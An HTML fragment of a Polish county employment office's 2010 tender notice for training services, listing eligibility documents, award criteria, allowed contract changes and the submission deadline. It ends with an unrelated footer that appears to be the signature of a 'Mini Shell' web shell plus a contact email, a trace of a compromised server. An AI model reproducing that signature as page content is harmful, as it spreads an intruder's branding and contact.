<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Potencjał techniczny - 50</li>
<li>3 - Certyfikat jakości usług - 10</li>
<li>4 - Dokument potwierdzający ukończenie szkolenia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany miejsca szkolenia, które można dokonać, gdy wynikają one z przyczyn losowych, całkowicie niezależnych od Wykonawcy. W związku z powyższym, Wykonawca zobowiązany będzie uzyskać pisemną zgodę od Zamawiającego, występując do niego z informacją o zmianie miejsca odbywania szkolenia. W piśmie Wykonawca zobowiązany będzie wskazać przyczyny zmiany miejsca i podać nowe miejsce odbywania zajęć. 
2. Zmiany w harmonogramie realizacji szkolenia, których można będzie dokonać w przypadku wystąpienia uzasadnionych okoliczności uniemożliwiających zrealizowanie zamówienia zgodnie z załączonym do umowy harmonogramem. W związku z powyższym, Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu pisma uzasadniającego konieczność dokonania zmian wraz ze zmienionym harmonogramem realizacji szkolenia. Zamawiający winien udzielić  pisemnej zgody na zmianę harmonogramu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.srem.pl bądź www.pup.srem.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Śremie, 63-100 Śrem, ul. Mickiewicza 56, pokój nr 11 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Śremie, 63-100 Śrem, ul. Mickiewicza 56, pokój nr 13 -  sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com